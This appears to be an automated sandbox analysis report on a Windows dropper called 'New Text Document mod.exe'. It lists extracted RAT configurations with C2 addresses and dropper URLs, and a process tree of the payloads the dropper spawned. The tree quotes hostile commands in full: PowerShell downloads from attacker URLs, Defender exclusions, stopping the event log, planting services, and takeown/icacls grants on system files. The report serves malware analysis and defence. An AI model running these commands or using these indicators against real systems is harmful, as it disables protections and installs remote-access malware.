Resubmissions

25-06-2024 11:24

240625-nhwp5swhja 10

25-06-2024 11:22

240625-ngzemszcrm 3

24-06-2024 00:56

240624-bamq2s1gma 10

23-06-2024 11:27

240623-nkejmsygnf 8

23-06-2024 11:15

240623-nchw4ayflh 10

23-06-2024 11:08

240623-m81w4syerb 10

23-06-2024 11:08

240623-m8qq5ssfpn 3

22-05-2024 09:14

240522-k7dzvaad9z 10

21-05-2024 10:21

240521-mdy42aaa2x 10

21-05-2024 10:18

240521-mcbx4shg72 10

Analysis

  • max time kernel
    99s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 09:14

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002

Extracted

Family

xworm

Version

5.0

C2

85.203.4.146:7000

5.182.87.154:7000

Mutex

eItTbYBfBYihwkyW

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    svchost.exe

aes.plain
aes.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

C2

85.209.133.18:4545

5.182.87.154:4449

Mutex

tdipywykihsjieff

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain
aes.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

79.132.193.215:4782

Mutex

f99ccef5-65c4-4972-adf2-fb38921cc9fc

Attributes
  • encryption_key

    1C15E91ACCFAC60B043A1336CF6912EA8572BA83

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

Extracted

Family

xworm

Attributes
  • Install_directory

    %AppData%

  • install_file

    taskhostw.exe

  • pastebin_url

    https://pastebin.com/raw/Xuc6dzua

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

127.0.0.1:8848

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 5 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • PureLog Stealer

    PureLog Stealer is an infostealer written in C#.

  • PureLog Stealer payload 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 3 IoCs
  • Windows security bypass 2 TTPs 6 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Possible privilege escalation attempt 32 IoCs
  • Stops running service(s) 4 TTPs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 42 IoCs
  • Loads dropped DLL 55 IoCs
  • Modifies file permissions 1 TTPs 32 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 7 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies system certificate store 2 TTPs 18 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 43 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Loads dropped DLL
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2740
    • C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe
      "C:\Users\Admin\AppData\Local\Temp\a\eagleget-2-1-6-50.exe"
      2⤵
      • Executes dropped EXE
      • Modifies system certificate store
      PID:1864
    • C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe
      "C:\Users\Admin\AppData\Local\Temp\a\AntiVirus2.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:684
    • C:\Users\Admin\AppData\Local\Temp\a\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:8456
      • C:\Windows\SysWOW64\comp.exe
        C:\Windows\SysWOW64\comp.exe
        3⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:8636
        • C:\Users\Admin\AppData\Local\Temp\FUT.au3
          C:\Users\Admin\AppData\Local\Temp\FUT.au3
          4⤵
          • Loads dropped DLL
          PID:2996
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 252
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:6456
    • C:\Users\Admin\AppData\Local\Temp\a\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\a\svchost.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:8588
    • C:\Users\Admin\AppData\Local\Temp\a\win1.exe
      "C:\Users\Admin\AppData\Local\Temp\a\win1.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:8664
    • C:\Users\Admin\AppData\Local\Temp\a\output.exe
      "C:\Users\Admin\AppData\Local\Temp\a\output.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1000
      • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
        "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\DOCUMENT (3).PDF"
        3⤵
        • Suspicious use of SetWindowsHookEx
        PID:3044
      • C:\Users\Admin\AppData\Local\Temp\SIG.EXE
        "C:\Users\Admin\AppData\Local\Temp\SIG.EXE"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        PID:2548
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:6724
    • C:\Users\Admin\AppData\Local\Temp\a\alabi.exe
      "C:\Users\Admin\AppData\Local\Temp\a\alabi.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3008
    • C:\Users\Admin\AppData\Local\Temp\a\crt.exe
      "C:\Users\Admin\AppData\Local\Temp\a\crt.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4600
      • C:\Users\Admin\AppData\Local\Temp\is-NKJOL.tmp\crt.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-NKJOL.tmp\crt.tmp" /SL5="$3017C,5149750,54272,C:\Users\Admin\AppData\Local\Temp\a\crt.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of FindShellTrayWindow
        PID:8372
        • C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe
          "C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -i
          4⤵
          • Executes dropped EXE
          PID:4988
        • C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe
          "C:\Users\Admin\AppData\Local\Sounder Midi Player\soundermidiplayer.exe" -s
          4⤵
          • Executes dropped EXE
          PID:5584
    • C:\Users\Admin\AppData\Local\Temp\a\oiii.exe
      "C:\Users\Admin\AppData\Local\Temp\a\oiii.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      PID:5180
    • C:\Users\Admin\AppData\Local\Temp\a\conhost.exe
      "C:\Users\Admin\AppData\Local\Temp\a\conhost.exe"
      2⤵
      • Executes dropped EXE
      PID:8552
      • C:\Windows\system32\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
        3⤵
        • Loads dropped DLL
        PID:9184
        • C:\Windows\system32\mode.com
          mode 65,10
          4⤵
            PID:968
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e file.zip -p563741341569714296105326100 -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2824
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_2.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2124
          • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
            7z.exe e extracted/file_1.zip -oextracted
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of AdjustPrivilegeToken
            PID:2584
          • C:\Windows\system32\attrib.exe
            attrib +H "svcshost.exe"
            4⤵
            • Views/modifies file attributes
            PID:2440
          • C:\Users\Admin\AppData\Local\Temp\main\svcshost.exe
            "svcshost.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:548
      • C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe
        "C:\Users\Admin\AppData\Local\Temp\a\sdf34ert3etgrthrthfghfghjfgh.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        PID:3252
        • C:\Users\Admin\AppData\Local\Temp\kat4B14.tmp
          C:\Users\Admin\AppData\Local\Temp\kat4B14.tmp
          3⤵
          • Executes dropped EXE
          • Checks processor information in registry
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:3436
      • C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe
        "C:\Users\Admin\AppData\Local\Temp\a\o2i3jroi23joj23ikrjokij3oroi.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        PID:5680
        • C:\Users\Admin\AppData\Local\Temp\kat5C72.tmp
          C:\Users\Admin\AppData\Local\Temp\kat5C72.tmp
          3⤵
          • Executes dropped EXE
          • Checks processor information in registry
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          PID:5812
      • C:\Users\Admin\AppData\Local\Temp\a\inte.exe
        "C:\Users\Admin\AppData\Local\Temp\a\inte.exe"
        2⤵
        • Executes dropped EXE
        PID:7700
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\inte.exe" & exit
          3⤵
            PID:1960
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im "inte.exe" /f
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1004
        • C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe
          "C:\Users\Admin\AppData\Local\Temp\a\vpn-1002.exe"
          2⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          PID:8404
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /c "C:\Users\Admin\AppData\Local\Temp\nse5EA6.tmp\abc.bat"
            3⤵
              PID:3912
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002','stat')"
                4⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:5968
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002', 'i2.bat')"
                4⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:6336
          • C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe
            "C:\Users\Admin\AppData\Local\Temp\a\tdrpload.exe"
            2⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Drops file in Windows directory
            PID:908
            • C:\Windows\sysblardsv.exe
              C:\Windows\sysblardsv.exe
              3⤵
              • Modifies security service
              • Windows security bypass
              • Executes dropped EXE
              • Loads dropped DLL
              • Windows security modification
              PID:6132
              • C:\Users\Admin\AppData\Local\Temp\1212912448.exe
                C:\Users\Admin\AppData\Local\Temp\1212912448.exe
                4⤵
                • Executes dropped EXE
                PID:8572
                • C:\Windows\syslmgrsvc.exe
                  C:\Windows\syslmgrsvc.exe
                  5⤵
                    PID:6056
                    • C:\Users\Admin\AppData\Local\Temp\1491825068.exe
                      C:\Users\Admin\AppData\Local\Temp\1491825068.exe
                      6⤵
                        PID:1228
                      • C:\Users\Admin\AppData\Local\Temp\172717314.exe
                        C:\Users\Admin\AppData\Local\Temp\172717314.exe
                        6⤵
                          PID:1028
                        • C:\Users\Admin\AppData\Local\Temp\322829355.exe
                          C:\Users\Admin\AppData\Local\Temp\322829355.exe
                          6⤵
                            PID:3080
                          • C:\Users\Admin\AppData\Local\Temp\53731040.exe
                            C:\Users\Admin\AppData\Local\Temp\53731040.exe
                            6⤵
                              PID:7656
                            • C:\Users\Admin\AppData\Local\Temp\2501326462.exe
                              C:\Users\Admin\AppData\Local\Temp\2501326462.exe
                              6⤵
                                PID:4412
                          • C:\Users\Admin\AppData\Local\Temp\290924743.exe
                            C:\Users\Admin\AppData\Local\Temp\290924743.exe
                            4⤵
                              PID:8116
                              • C:\Windows\winqlsdrvcs.exe
                                C:\Windows\winqlsdrvcs.exe
                                5⤵
                                  PID:8632
                                  • C:\Users\Admin\AppData\Local\Temp\3893518826.exe
                                    C:\Users\Admin\AppData\Local\Temp\3893518826.exe
                                    6⤵
                                      PID:8060
                                    • C:\Users\Admin\AppData\Local\Temp\2300410305.exe
                                      C:\Users\Admin\AppData\Local\Temp\2300410305.exe
                                      6⤵
                                        PID:7620
                                      • C:\Users\Admin\AppData\Local\Temp\1236434862.exe
                                        C:\Users\Admin\AppData\Local\Temp\1236434862.exe
                                        6⤵
                                          PID:4132
                                    • C:\Users\Admin\AppData\Local\Temp\1577628941.exe
                                      C:\Users\Admin\AppData\Local\Temp\1577628941.exe
                                      4⤵
                                        PID:3500
                                        • C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"
                                          5⤵
                                            PID:8268
                                          • C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"
                                            5⤵
                                              PID:2116
                                            • C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe
                                              "C:\Users\Admin\AppData\Local\Temp\Windows Security Upgrade Service.exe"
                                              5⤵
                                                PID:5816
                                            • C:\Users\Admin\AppData\Local\Temp\2157220217.exe
                                              C:\Users\Admin\AppData\Local\Temp\2157220217.exe
                                              4⤵
                                                PID:2008
                                                • C:\Users\Admin\AppData\Local\Temp\1000613466.exe
                                                  C:\Users\Admin\AppData\Local\Temp\1000613466.exe
                                                  5⤵
                                                    PID:2604
                                                • C:\Users\Admin\AppData\Local\Temp\2998211445.exe
                                                  C:\Users\Admin\AppData\Local\Temp\2998211445.exe
                                                  4⤵
                                                    PID:4956
                                                  • C:\Users\Admin\AppData\Local\Temp\30102721.exe
                                                    C:\Users\Admin\AppData\Local\Temp\30102721.exe
                                                    4⤵
                                                      PID:5900
                                                • C:\Users\Admin\AppData\Local\Temp\a\print.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\a\print.exe"
                                                  2⤵
                                                  • Drops file in Drivers directory
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:7676
                                                  • C:\Windows\system32\powercfg.exe
                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                    3⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:7240
                                                  • C:\Windows\system32\powercfg.exe
                                                    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                    3⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:5372
                                                  • C:\Windows\system32\powercfg.exe
                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                    3⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:6196
                                                  • C:\Windows\system32\powercfg.exe
                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                    3⤵
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:6428
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                    3⤵
                                                    • Launches sc.exe
                                                    PID:3332
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                    3⤵
                                                    • Launches sc.exe
                                                    PID:3460
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe stop eventlog
                                                    3⤵
                                                    • Launches sc.exe
                                                    PID:3592
                                                  • C:\Windows\system32\sc.exe
                                                    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                    3⤵
                                                    • Launches sc.exe
                                                    PID:3616
                                                • C:\Users\Admin\AppData\Local\Temp\a\222.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\a\222.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:5216
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                                    3⤵
                                                    • Loads dropped DLL
                                                    PID:8420
                                                    • C:\Windows\system32\mode.com
                                                      mode 65,10
                                                      4⤵
                                                        PID:2104
                                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                        7z.exe e file.zip -p209313910271864811381312692 -oextracted
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2252
                                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                        7z.exe e extracted/file_8.zip -oextracted
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:9180
                                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                        7z.exe e extracted/file_7.zip -oextracted
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:320
                                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                        7z.exe e extracted/file_6.zip -oextracted
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2872
                                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                        7z.exe e extracted/file_5.zip -oextracted
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2992
                                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                        7z.exe e extracted/file_4.zip -oextracted
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:2956
                                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                        7z.exe e extracted/file_3.zip -oextracted
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1496
                                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                        7z.exe e extracted/file_2.zip -oextracted
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3244
                                                      • C:\Users\Admin\AppData\Local\Temp\main\7z.exe
                                                        7z.exe e extracted/file_1.zip -oextracted
                                                        4⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        PID:3444
                                                      • C:\Windows\system32\attrib.exe
                                                        attrib +H "Installer.exe"
                                                        4⤵
                                                        • Views/modifies file attributes
                                                        PID:3688
                                                      • C:\Users\Admin\AppData\Local\Temp\main\Installer.exe
                                                        "Installer.exe"
                                                        4⤵
                                                        • Executes dropped EXE
                                                        PID:3784
                                                        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          PID:8912
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                          5⤵
                                                            PID:3904
                                                            • C:\Windows\system32\wusa.exe
                                                              wusa /uninstall /kb:890830 /quiet /norestart
                                                              6⤵
                                                                PID:4924
                                                            • C:\Windows\system32\powercfg.exe
                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                              5⤵
                                                                PID:4220
                                                              • C:\Windows\system32\powercfg.exe
                                                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                5⤵
                                                                  PID:4272
                                                                • C:\Windows\system32\powercfg.exe
                                                                  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                  5⤵
                                                                    PID:4364
                                                                  • C:\Windows\system32\powercfg.exe
                                                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                    5⤵
                                                                      PID:2428
                                                                    • C:\Windows\system32\sc.exe
                                                                      C:\Windows\system32\sc.exe delete "OARKQOLE"
                                                                      5⤵
                                                                      • Launches sc.exe
                                                                      PID:4496
                                                                    • C:\Windows\system32\sc.exe
                                                                      C:\Windows\system32\sc.exe create "OARKQOLE" binpath= "C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe" start= "auto"
                                                                      5⤵
                                                                      • Launches sc.exe
                                                                      PID:5352
                                                                    • C:\Windows\system32\sc.exe
                                                                      C:\Windows\system32\sc.exe stop eventlog
                                                                      5⤵
                                                                      • Launches sc.exe
                                                                      PID:5468
                                                                    • C:\Windows\system32\sc.exe
                                                                      C:\Windows\system32\sc.exe start "OARKQOLE"
                                                                      5⤵
                                                                      • Launches sc.exe
                                                                      PID:3180
                                                              • C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\a\Pirate_24S.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:4708
                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.vbs"
                                                                  3⤵
                                                                    PID:5268
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.cmd" "
                                                                      4⤵
                                                                        PID:6308
                                                                        • C:\Windows\system32\reg.exe
                                                                          C:\Windows\Sysnative\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName
                                                                          5⤵
                                                                            PID:6972
                                                                          • C:\Windows\SysWOW64\find.exe
                                                                            find /i "Windows 7"
                                                                            5⤵
                                                                              PID:1976
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Users\Admin\AppData\Local\Temp /r /d y
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:8076
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Users\Admin\AppData\Local\Temp /t /grant everyone:f
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3264
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\Sysnative\slwga.dll
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3308
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\Sysnative\slwga.dll /grant everyone:f
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3352
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\Sysnative\sppwmi.dll
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3392
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\Sysnative\sppwmi.dll /grant everyone:f
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3420
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\Sysnative\systemcpl.dll
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3452
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\Sysnative\systemcpl.dll /grant everyone:f
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3480
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\Sysnative\user32.dll
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3628
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\Sysnative\user32.dll /grant everyone:f
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3672
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\Sysnative\winlogon.exe
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3712
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\Sysnative\winlogon.exe /grant everyone:f
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3736
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\Sysnative\winver.exe
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3796
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\Sysnative\winver.exe /grant everyone:f
